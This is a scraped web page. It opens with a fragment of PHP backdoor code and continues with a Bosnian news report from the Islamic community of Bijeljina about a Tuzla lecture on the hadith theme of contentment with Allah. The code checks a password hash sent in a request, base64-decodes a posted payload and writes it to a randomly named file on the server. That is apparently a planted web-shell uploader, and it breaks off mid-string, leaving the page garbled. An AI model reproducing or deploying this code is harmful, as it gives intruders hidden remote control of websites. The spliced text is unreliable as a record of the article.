function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Drugo predavanje Katedre tefsira i hadisa u Tuzli - Medžlis Islamske zajednice Bijeljina

Drugo predavanje Katedre tefsira i hadisa u Tuzli

Drugo predavanje Katedre tefsira i hadisa u Tuzli

Održano drugo predavanje Katedre tefsira i hadisa, u srijedu, 17. decembra u džamiji Kralj Abdullah.

Tema „Zadovoljan sam Allahom kao Gospodarom” na ovom drugom susretu je zaokružena predavanjem, Amir-ef. Hodžića, profesora Behram-begove medrese u Tuzli, koji je o istoj govorio sa aspekta hadisa.

Govoreći na ovu temu prof. Hodžić je kroz niz vjerodostojnih hadisa ukazao na važnost zadovoljstva definišući ga kao smirivanje duše i kao jednu od osobina koju posjeduje vjernik, onaj koji vjeruje.

Kroz svoje izlaganje Hodžić je naglasio da postoji više vrsta zadovoljstva u životu vjernika te da se to zadovoljstvo manifestuje i u ibadetima, u zahvali na onom što nam je Svevišnji podario i za nas namijenio. „ Ko ispuni srce zadovoljstvom Allahom kao Gospodarom Allah će njegovo srce ispuniti sa bogatstvom.” Plodovi zadovoljstva kojima treba težiti svaki vjernik su postizanje berićeta u opskrbi, lijep (rahat) život, ulazak u Džennet i postizanje Allahovog zadovoljstva. – dodao je prof. Hodžić.

Katedra tefsira i hadisa se nastavlja narednog mjeseca, prve i treće srijede u mjesecu kada će se govoriti o novim temama sa aspekta tefsira i hadisa. Katedra će obuhvatiti 24 teme koje će biti obrađene sa dva pomenuta aspekta.

Organizatori Katedre su Muftijstvo tuzlansko i Medžlis Islamske zajednice Tuzla.

(www.miztuzla.com)